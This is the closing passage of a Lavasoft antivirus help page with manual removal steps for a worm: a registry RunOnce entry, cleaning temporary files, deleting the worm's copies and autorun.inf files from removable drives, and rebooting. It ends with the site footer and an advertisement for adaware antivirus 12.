    [HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\RunOnce]
    "GrpConv" = "grpconv -o"

  5. Clean the Temporary Internet Files folder, which may contain infected files (How to clean Temporary Internet Files folder).
  6. Find and delete all copies of the worm's file together with "autorun.inf" scripts on removable drives.
  7. Reboot the computer.

*Manual removal may cause unexpected system behaviour and should be performed at your own risk.

No votes yet


Lavasoft is the maker of Ad-Aware, the world's most popular anti-malware software with over 450 million downloads.
© 2024 Lavasoft. All rights reserved.
Terms Of Use |   Privacy Policy


x

Our best antivirus yet!

Fresh new look. Faster scanning. Better protection.

Enjoy unique new features, lightning fast scans and a simple yet beautiful new look in our best antivirus yet!

For a quicker, lighter and more secure experience, download the all new adaware antivirus 12 now!

Download adaware antivirus 12
No thanks, continue to lavasoft.com
close x

Discover the new adaware antivirus 12

Our best antivirus yet

Download Now